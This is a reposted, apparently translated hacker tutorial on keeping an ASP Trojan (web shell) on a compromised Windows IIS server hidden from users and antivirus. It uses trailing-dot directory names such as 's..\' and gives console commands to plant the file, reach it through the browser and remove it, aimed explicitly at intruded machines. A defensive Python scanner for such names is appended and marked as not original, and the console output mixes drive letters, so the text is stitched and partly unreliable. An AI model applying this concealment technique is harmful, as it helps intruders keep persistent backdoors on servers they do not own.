Keeping ASP Trojans from being killed

xiaoxiao2021-03-06  80

Hacker back door: keeping an ASP Trojan from being killed. You may think this means modifying the ASP Trojan, changing or encrypting its code so that it escapes the antivirus. Wrong. Nothing has to be modified, and no one can guarantee that an ASP file you modified will not be killed by XX antivirus software. Anyway, I am lazy too. We run CMD and cd to C:\Winnt\System32\MyHome, that is, the directory your virtual directory points to.

First, some background. Everyone knows that the "\" symbol is the path separator in Windows: "C:\Windows\" means the Windows folder on the C partition, and "C:\Windows\system.exe" means the system.exe file in the Windows folder on the C partition. So let us suppose a file name itself contained a "\" symbol. If "S\" is the name of a folder and that folder is located in "F:\", its path is "F:\S\". When we try to access it, Windows gets it wrong and thinks the file we want to open is the S folder of the C partition, so Windows cannot open it and returns an error, because that path does not exist. Maybe you are trying to create an "S\" file right now, but Windows will tell you that the "\" symbol cannot be used in the name of a file or folder. It seems Windows has thought of this. OK, we continue: do not believe that files containing the "\" symbol cannot be created. Now turn on your computer; we are going to make some very interesting attempts.
After entering Windows, click Start > Run, type "CMD" and press Enter (on Win98, type "command"). You will see the Windows command console, which we will use for the rest of the tests. What follows contains a lot of commands; the text in {} is my comment:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WinNT\System32\MyHome>mkdir s\
    {Our first attempt. Windows only created the S folder; the "\" was ignored}
C:\Winnt\System32\MyHome>mkdir s\s1\
    {Still failed. Windows created the S folder first, then the S1 folder}
C:\Winnt\System32\MyHome>mkdir s.\
    {"S.\" is parsed as "S" and the ".\" is ignored; Windows reports that "S.\" already exists}
C:\Winnt\System32\MyHome>mkdir s..\
    {Finally. Now you can see "s." in Explorer, but you cannot open or delete it}
C:\Winnt\System32\MyHome>mkdir s...\
    {Succeeded. In Explorer you can see "S..", which you can open but cannot delete}

Why is this? Let's first talk about the "S." folder you see, the one you can neither open nor delete. It cannot be opened because its actual path is "C:\Winnt\System32\MyHome\s..\" (we created it, so we know its actual path), but the name shown in Windows Explorer becomes "S.". That is to say, when you try to open it, Windows actually tries to open "C:\Winnt\System32\MyHome\s.\". Of course that fails: the file does not exist, so Windows reports an error. It cannot be deleted for the same reason: Windows resolves the path of a file that really exists to a path that does not exist, so the XX action cannot be carried out.

Now for the other folder, the one that can be opened but cannot be deleted. Wait... opened? Do you think Windows really opens the "s...\" folder we created? The following test will make it clear. As before, the text in {} is my annotation, to make things easier to follow:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Winnt\System32\MyHome>copy net.asp s..\
    {Copy your ASP Trojan file to "s..\", the folder shown as "S." in Explorer}
1 file copied.
C:\Winnt\System32\MyHome>

Now go back to Explorer and open the "S." folder. What do you see? How did the "net.asp" file get here? Didn't we just copy it to "S."? Could it be that opening the "S." folder actually opens "s"? That is exactly what happens. In fact, if you create an "S" folder, "S." can be opened, but what actually opens is "S". This is the key point. We use the S. directory, which does not get scanned, to hide our Trojan, whether it is a Trojan or a virus. An ordinary exe file cannot run from a directory like S., but an ASP Trojan can! You can run the CMD commands through the browser: copy net.asp into the s. directory and remove net.asp. Then, in the browser, we open http://127.0.0.1/kiss/kiss/s../net.asp

You can see that the ASP Trojan comes up, and an ordinary user cannot find it. Even professional antivirus software will only look at "s" and skip "s..\". Now let's talk about how to delete it:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

F:\Test>dir
 The volume in drive F is bgting
 The volume serial number is 2C8E-FE1C

 Directory of F:\test

2003-09-11  17:50    .
2003-09-11  17:50    ..
2003-09-11  18:35    S.
2003-09-11  18:37    s..
               1 file              9 bytes
               5 directories  3,390,029,824 bytes available

C:\Winnt\System32\MyHome>rmdir s..\
The directory is not empty.
C:\Winnt\System32\MyHome>rmdir s..\ /s
s..\, Are you sure (Y/N)? y
C:\Winnt\System32\MyHome>rmdir s...\ /s
s...\, Are you sure (Y/N)? y

This way you do not have to worry about damaging your compromised machine. So that is how such a very well hidden back door is built, one that will not be killed. On a compromised machine, the steps above should be tested over 3389.
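A defender-side check for the naming trick described above, as an added example that is not part of the original article: it flags directory or file names whose real name ends in a dot or space, both on disk and in the cs-uri-stem field of a W3C-format IIS log. The function names and the sample log are constructed for illustration; the "\\?\" prefix is assumed to be applied to a local drive path, not a UNC share.

```python
import os
from urllib.parse import unquote

def is_deceptive(component):
    """True if Win32 normalisation would show or resolve this name as a
    different one, i.e. it ends in '.' or ' ' ('.' and '..' are legitimate)."""
    return component not in (".", "..") and component != component.rstrip(". ")

def scan_tree(root):
    """List on-disk entries whose real name ends in a dot or space."""
    root = os.path.abspath(root)
    if os.name == "nt" and not root.startswith("\\\\?\\"):
        # Extended-length prefix: the path is passed through without the
        # trailing-dot stripping that hides these entries from normal tools.
        root = "\\\\?\\" + root
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if is_deceptive(name):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)

# Constructed sample log lines (W3C extended format), not taken from a real server.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem sc-status",
    "2003-09-11 18:40:01 GET /kiss/kiss/s../net.asp 200",
    "2003-09-11 18:40:05 GET /kiss/default.asp 200",
    "2003-09-11 18:41:12 GET /kiss/kiss/s%2E%2E/net.asp 200",
    "2003-09-11 18:41:30 GET /kiss/../index.asp 404",
]

def scan_iis_log(lines):
    """Return request paths that contain a segment ending in '.' or ' '."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows below
            continue
        if line.startswith("#") or not line.strip() or "cs-uri-stem" not in fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "")
        # Decode %2E and similar before testing each path segment.
        if any(is_deceptive(seg) for seg in unquote(stem).split("/")):
            hits.append(stem)
    return hits

if __name__ == "__main__":
    for path in scan_iis_log(SAMPLE_LOG):
        print("suspicious request:", path)
    for path in scan_tree("."):
        print("suspicious on-disk name:", path)
```

Entries reported by scan_tree can then be inspected and removed with the rmdir /s form shown in the console session above.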

When reposting, please cite the original address: https://www.9cbs.com/read-121583.html
